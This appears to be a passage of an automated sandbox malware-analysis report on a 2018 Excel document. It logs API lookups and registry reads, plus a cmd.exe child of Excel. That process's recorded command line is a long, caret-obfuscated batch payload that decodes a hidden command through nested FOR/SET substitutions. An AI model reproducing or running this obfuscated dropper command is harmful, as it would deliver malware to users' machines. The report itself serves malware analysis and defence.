Get Address Unknown module name function = CreateTypeLib2, address_out = 0x7feffe0dbd0 True 1
Fn
Get Address Unknown module name function = VarDateFromUdate, address_out = 0x7feffd85c90 True 1
Fn
Get Address Unknown module name function = VarUdateFromDate, address_out = 0x7feffd86330 True 1
Fn
Get Address Unknown module name function = GetAltMonthNames, address_out = 0x7feffda66c0 True 1
Fn
Get Address Unknown module name function = VarNumFromParseNum, address_out = 0x7feffd84710 True 1
Fn
Get Address Unknown module name function = VarParseNumFromStr, address_out = 0x7feffd848f0 True 1
Fn
Get Address Unknown module name function = VarDecFromR4, address_out = 0x7feffdbb640 True 1
Fn
Get Address Unknown module name function = VarDecFromR8, address_out = 0x7feffdbb360 True 1
Fn
Get Address Unknown module name function = VarDecFromDate, address_out = 0x7feffdc2640 True 1
Fn
Get Address Unknown module name function = VarDecFromI4, address_out = 0x7feffda58a0 True 1
Fn
Get Address Unknown module name function = VarDecFromCy, address_out = 0x7feffda5820 True 1
Fn
Get Address Unknown module name function = VarR4FromDec, address_out = 0x7feffdbaf20 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromTypeInfo, address_out = 0x7feffdda0c0 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromGuids, address_out = 0x7feffe12160 True 1
Fn
Get Address Unknown module name function = SafeArrayGetRecordInfo, address_out = 0x7feffda5af0 True 1
Fn
Get Address Unknown module name function = SafeArraySetRecordInfo, address_out = 0x7feffda5a90 True 1
Fn
Get Address Unknown module name function = SafeArrayGetIID, address_out = 0x7feffda5a60 True 1
Fn
Get Address Unknown module name function = SafeArraySetIID, address_out = 0x7feffda5a30 True 1
Fn
Get Address Unknown module name function = SafeArrayCopyData, address_out = 0x7feffd860b0 True 1
Fn
Get Address Unknown module name function = SafeArrayAllocDescriptorEx, address_out = 0x7feffd83e90 True 1
Fn
Get Address Unknown module name function = SafeArrayCreateEx, address_out = 0x7feffdd9f80 True 1
Fn
Get Address Unknown module name function = VarFormat, address_out = 0x7feffe09b20 True 1
Fn
Get Address Unknown module name function = VarFormatDateTime, address_out = 0x7feffe09aa0 True 1
Fn
Get Address Unknown module name function = VarFormatNumber, address_out = 0x7feffe09990 True 1
Fn
Get Address Unknown module name function = VarFormatPercent, address_out = 0x7feffe09890 True 1
Fn
Get Address Unknown module name function = VarFormatCurrency, address_out = 0x7feffe09770 True 1
Fn
Get Address Unknown module name function = VarWeekdayName, address_out = 0x7feffdeb8d0 True 1
Fn
Get Address Unknown module name function = VarMonthName, address_out = 0x7feffdeb800 True 1
Fn
Get Address Unknown module name function = VarAdd, address_out = 0x7feffe048e0 True 1
Fn
Get Address Unknown module name function = VarAnd, address_out = 0x7feffe09470 True 1
Fn
Get Address Unknown module name function = VarCat, address_out = 0x7feffe096a0 True 1
Fn
Get Address Unknown module name function = VarDiv, address_out = 0x7feffe02fe0 True 1
Fn
Get Address Unknown module name function = VarEqv, address_out = 0x7feffe09cf0 True 1
Fn
Get Address Unknown module name function = VarIdiv, address_out = 0x7feffe08ff0 True 1
Fn
Get Address Unknown module name function = VarImp, address_out = 0x7feffe09c00 True 1
Fn
Get Address Unknown module name function = VarMod, address_out = 0x7feffe08e60 True 1
Fn
Get Address Unknown module name function = VarMul, address_out = 0x7feffe03690 True 1
Fn
Get Address Unknown module name function = VarOr, address_out = 0x7feffe092d0 True 1
Fn
Get Address Unknown module name function = VarPow, address_out = 0x7feffe02e80 True 1
Fn
Get Address Unknown module name function = VarSub, address_out = 0x7feffe03f90 True 1
Fn
Get Address Unknown module name function = VarXor, address_out = 0x7feffe091a0 True 1
Fn
Get Address Unknown module name function = VarAbs, address_out = 0x7feffde7c30 True 1
Fn
Get Address Unknown module name function = VarFix, address_out = 0x7feffde7a60 True 1
Fn
Get Address Unknown module name function = VarInt, address_out = 0x7feffde7890 True 1
Fn
Get Address Unknown module name function = VarNeg, address_out = 0x7feffde7ea0 True 1
Fn
Get Address Unknown module name function = VarNot, address_out = 0x7feffe09600 True 1
Fn
Get Address Unknown module name function = VarRound, address_out = 0x7feffde76a0 True 1
Fn
Get Address Unknown module name function = VarCmp, address_out = 0x7feffe083f0 True 1
Fn
Get Address Unknown module name function = VarDecAdd, address_out = 0x7feffdb3070 True 1
Fn
Get Address Unknown module name function = VarDecCmp, address_out = 0x7feffdbd700 True 1
Fn
Get Address Unknown module name function = VarBstrCat, address_out = 0x7feffdbd890 True 1
Fn
Get Address Unknown module name function = VarCyMulI4, address_out = 0x7feffd9caf0 True 1
Fn
Get Address Unknown module name function = VarBstrCmp, address_out = 0x7feffda8a00 True 1
Fn
Get Address Unknown module name address_out = 0x7fee5a4fcd0 True 1
Fn
Get Address Unknown module name address_out = 0x0 False 1
Fn
Get Address Unknown module name function = 600, address_out = 0x7fee5de4ee0 True 3
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = ThunderMain, wndproc_parameter = 0 True 1
Fn
Keyboard (62)
»
Operation Additional Information Success Count Logfile
Read virtual_key_code = VK_ESCAPE, result_out = 0 True 62
Fn
System (21)
»
Operation Additional Information Success Count Logfile
Get Cursor x_out = 555, y_out = 565 True 1
Fn
Get Cursor x_out = 723, y_out = 490 True 1
Fn
Get Cursor x_out = 1072, y_out = 125 True 1
Fn
Get Time type = System Time, time = 2018-11-06 10:24:02 (UTC) True 1
Fn
Get Time type = Ticks, time = 127749 True 1
Fn
Get Time type = Local Time, time = 2018-11-06 10:24:03 (Local Time) True 4
Fn
Get Time type = Local Time, time = 2018-11-06 10:24:07 (Local Time) True 1
Fn
Get Time type = Ticks, time = 312548 True 7
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Operating System True 2
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = DDRYBUR False 1
Fn
Process #3: cmd.exe
119 0
»
Information Value
ID #3
File Name c:\windows\system32\cmd.exe
Command Line CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:37, Reason: Child Process
Unmonitor End Time: 00:02:06, Reason: Self Terminated
Monitor Duration 00:00:29
OS Process Information
»
Information Value
PID 0xac0
Parent PID 0x8f8 (c:\program files\microsoft office\root\office16\excel.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AC4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory rw True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory rw True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory rw True False False -
private_0x0000000000130000 0x00130000 0x0022ffff Private Memory rw True False False -
private_0x0000000000230000 0x00230000 0x0032ffff Private Memory rw True False False -
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory rw True False False -
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory r True False False -
private_0x0000000000600000 0x00600000 0x0060ffff Private Memory rw True False False -
pagefile_0x0000000000610000 0x00610000 0x00790fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007a0000 0x007a0000 0x01b9ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001ba0000 0x01ba0000 0x01ee2fff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01ef0000 0x021befff Memory Mapped File r False False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffda000 0x7fffffda000 0x7fffffdafff Private Memory rw True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (35)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 5
Fn
Open STD_OUTPUT_HANDLE - True 20
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Write STD_OUTPUT_HANDLE size = 2 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 26 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 3 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 7988 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create cmd.exe - True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xb04, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CMD.Exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:11 (UTC) True 1
Fn
Get Time type = Ticks, time = 136781 True 1
Fn
Environment (53)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = ^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O , False 1
Fn
Get Environment String name = ^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^ False 1
Fn
Get Environment String name = ^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^ False 1
Fn
Get Environment String name = ^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^ False 1
Fn
Get Environment String name = ^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^ False 1
Fn
Get Environment String name = ^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^ False 1
Fn
Get Environment String name = ^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^ False 1
Fn
Get Environment String name = ^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^ False 1
Fn
Get Environment String name = ^R^en^6^w^L^P^jy^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^ False 1
Fn
